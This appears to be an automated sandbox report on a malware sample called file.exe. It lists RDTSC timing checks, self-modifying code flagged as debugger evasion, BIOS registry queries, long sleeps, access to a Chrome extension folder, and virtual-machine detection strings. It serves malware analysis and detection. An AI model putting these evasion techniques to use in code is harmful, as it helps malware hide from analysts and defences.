          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE05D3 second address: 4BE05F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE05F7 second address: 4BE05FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE05FB second address: 4BE0601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0601 second address: 4BE0643 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FBA8CCF3D61h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FBA8CCF3D5Ah 0x0000001c mov si, CEC1h 0x00000020 popad 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0643 second address: 4BE066A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e mov ax, bx 0x00000011 push eax 0x00000012 push edx 0x00000013 mov dh, 4Ah 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE066A second address: 4BE0685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBA8CCF3D61h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0685 second address: 4BE068B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0700 second address: 4BE0736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FBA8CCF3D63h 0x0000000a or cl, FFFFFFCEh 0x0000000d jmp 00007FBA8CCF3D69h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0736 second address: 4BE07D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [ebp-04h], 00000000h 0x0000000d pushad 0x0000000e push eax 0x0000000f pushfd 0x00000010 jmp 00007FBA8CEE23CFh 0x00000015 xor ax, 3E8Eh 0x0000001a jmp 00007FBA8CEE23D9h 0x0000001f popfd 0x00000020 pop ecx 0x00000021 popad 0x00000022 test ebx, ebx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FBA8CEE23CDh 0x0000002b or si, BAC6h 0x00000030 jmp 00007FBA8CEE23D1h 0x00000035 popfd 0x00000036 push eax 0x00000037 mov cx, di 0x0000003a pop edi 0x0000003b popad 0x0000003c je 00007FBAFDDA4CD1h 0x00000042 jmp 00007FBA8CEE23D6h 0x00000047 lea eax, dword ptr [ebp-00000110h] 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE07D8 second address: 4BE07DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE07DC second address: 4BE07E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE07E2 second address: 4BE0801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 3DCDCE61h 0x00000008 mov edi, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBA8CCF3D5Fh 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0801 second address: 4BE0847 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBA8CEE23CAh 0x00000013 jmp 00007FBA8CEE23D5h 0x00000018 popfd 0x00000019 mov di, si 0x0000001c popad 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE08D3 second address: 4BE08D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE09A4 second address: 4BE09CD instructions: 0x00000000 rdtsc 0x00000002 call 00007FBA8CEE23D8h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov si, bx 0x0000000d popad 0x0000000e test eax, eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE09CD second address: 4BE09D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE09D1 second address: 4BE09D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE09D5 second address: 4BE09DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE09DB second address: 4BE09EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CEE23CCh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE09EB second address: 4BE0A19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FBAFDBB641Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBA8CCF3D65h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0A19 second address: 4BE0A71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FBA8CEE23D2h 0x00000012 sbb cx, 7168h 0x00000017 jmp 00007FBA8CEE23CBh 0x0000001c popfd 0x0000001d call 00007FBA8CEE23D8h 0x00000022 movzx ecx, bx 0x00000025 pop ebx 0x00000026 popad 0x00000027 mov dword ptr [esp], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov dl, 41h 0x0000002f push eax 0x00000030 pop ebx 0x00000031 popad 0x00000032 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0ACF second address: 4BD0B33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, CCD2h 0x00000007 pushfd 0x00000008 jmp 00007FBA8CCF3D63h 0x0000000d xor ax, 90CEh 0x00000012 jmp 00007FBA8CCF3D69h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d mov ch, bh 0x0000001f push esi 0x00000020 mov cx, di 0x00000023 pop ebx 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FBA8CCF3D68h 0x0000002f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0B33 second address: 4BD0B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0B37 second address: 4BD0B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0B3D second address: 4BD0B70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007FBA8CEE23CEh 0x00000011 mov eax, 69DA09A1h 0x00000016 popad 0x00000017 mov ecx, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d movzx eax, di 0x00000020 popad 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0B70 second address: 4BD0BE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b jmp 00007FBA8CCF3D60h 0x00000010 je 00007FBAFDD75E02h 0x00000016 pushad 0x00000017 push eax 0x00000018 call 00007FBA8CCF3D5Dh 0x0000001d pop ecx 0x0000001e pop edi 0x0000001f call 00007FBA8CCF3D5Eh 0x00000024 mov ch, 42h 0x00000026 pop edx 0x00000027 popad 0x00000028 mov edx, dword ptr [ebp+0Ch] 0x0000002b jmp 00007FBA8CCF3D5Ah 0x00000030 test edx, edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FBA8CCF3D67h 0x00000039 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0008 second address: 4BC000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC000C second address: 4BC0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0012 second address: 4BC003F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 pushfd 0x00000007 jmp 00007FBA8CEE23CEh 0x0000000c add ah, 00000078h 0x0000000f jmp 00007FBA8CEE23CBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC003F second address: 4BC0047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, ax 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0047 second address: 4BC0075 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA8CEE23D4h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0075 second address: 4BC007B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC007B second address: 4BC00D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBA8CEE23CCh 0x00000013 sub eax, 7D0CA498h 0x00000019 jmp 00007FBA8CEE23CBh 0x0000001e popfd 0x0000001f mov eax, 6C0EAA4Fh 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007FBA8CEE23D2h 0x0000002c mov eax, dword ptr [ebp+10h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC00D2 second address: 4BC00D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC00D6 second address: 4BC00DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC00DC second address: 4BC011E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FBA8CCF3D5Eh 0x00000012 and ecx, 6DE11888h 0x00000018 jmp 00007FBA8CCF3D5Bh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 mov cx, 6D15h 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC011E second address: 4BC0145 instructions: 0x00000000 rdtsc 0x00000002 mov dh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007FBAFD359F8Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBA8CEE23D8h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0145 second address: 4BC018F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov edi, eax 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FBA8CCF3D5Fh 0x0000001a xor si, 5F8Eh 0x0000001f jmp 00007FBA8CCF3D69h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC018F second address: 4BC01CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov edi, 3453BCEEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jmp 00007FBA8CEE23D5h 0x00000014 push dword ptr [eax] 0x00000016 pushad 0x00000017 mov al, 3Dh 0x00000019 mov ecx, ebx 0x0000001b popad 0x0000001c lea eax, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FBA8CEE23CEh 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC01CE second address: 4BC022A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007FBA8CCF3D66h 0x00000011 push 00000004h 0x00000013 jmp 00007FBA8CCF3D60h 0x00000018 nop 0x00000019 pushad 0x0000001a mov eax, ebx 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f jmp 00007FBA8CCF3D64h 0x00000024 pushad 0x00000025 mov cx, 0F07h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0253 second address: 4BC0257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0257 second address: 4BC025D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC025D second address: 4BC027F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp eax, C0000004h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC027F second address: 4BC0283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0283 second address: 4BC02A9 instructions: 0x00000000 rdtsc 0x00000002 mov bh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007FBA8CEE240Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBA8CEE23D7h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC02A9 second address: 4BC02AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC02AF second address: 4BC0306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add eax, 1Fh 0x0000000e jmp 00007FBA8CEE23D6h 0x00000013 test eax, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FBA8CEE23CDh 0x0000001e add si, E026h 0x00000023 jmp 00007FBA8CEE23D1h 0x00000028 popfd 0x00000029 mov ah, 05h 0x0000002b popad 0x0000002c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0306 second address: 4BC032D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FBAFD141AEBh 0x0000000f pushad 0x00000010 mov si, 2B9Dh 0x00000014 mov cx, E499h 0x00000018 popad 0x00000019 mov ecx, eax 0x0000001b pushad 0x0000001c push esi 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0025 second address: 4BE007B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dh, 03h 0x0000000d jmp 00007FBA8CEE23CAh 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 mov eax, 4889D56Dh 0x0000001a mov si, 5B69h 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007FBA8CEE23D4h 0x00000026 xchg eax, ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FBA8CEE23CAh 0x00000030 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE007B second address: 4BE007F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE007F second address: 4BE0085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0085 second address: 4BE008B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE008B second address: 4BE008F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE008F second address: 4BE0093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0093 second address: 4BE00B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBA8CEE23D2h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE00B0 second address: 4BE00FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov si, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ecx 0x0000000d pushad 0x0000000e mov dl, 16h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FBA8CCF3D5Ch 0x00000017 add ah, 00000028h 0x0000001a jmp 00007FBA8CCF3D5Bh 0x0000001f popfd 0x00000020 popad 0x00000021 popad 0x00000022 push esp 0x00000023 jmp 00007FBA8CCF3D62h 0x00000028 mov dword ptr [esp], ecx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE00FB second address: 4BE00FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE00FF second address: 4BE0105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0105 second address: 4BE0114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CEE23CBh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0114 second address: 4BE0145 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBA8CCF3D5Dh 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0145 second address: 4BE014B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE014B second address: 4BE014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Tries to evade debugger and weak emulator (self modifying code)
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6698D4 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 89B549 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04BB06B2 rdtsc 0_2_04BB06B2
          Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.1 %
          Source: C:\Users\user\Desktop\file.exe TID: 7116Thread sleep time: -40020s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 7120Thread sleep time: -42021s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 5652Thread sleep time: -32000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 7024Thread sleep time: -40020s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
          Source: file.exe, file.exe, 00000000.00000002.2492681131.00000000007EB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: Amcache.hve.9.drBinary or memory string: VMware
          Source: file.exe, 00000000.00000002.2493161809.0000000000D91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
          Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: file.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.9.drBinary or memory string: vmci.sys
          Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
          Source: file.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
          Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.9.drBinary or memory string: VMware20,1
          Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
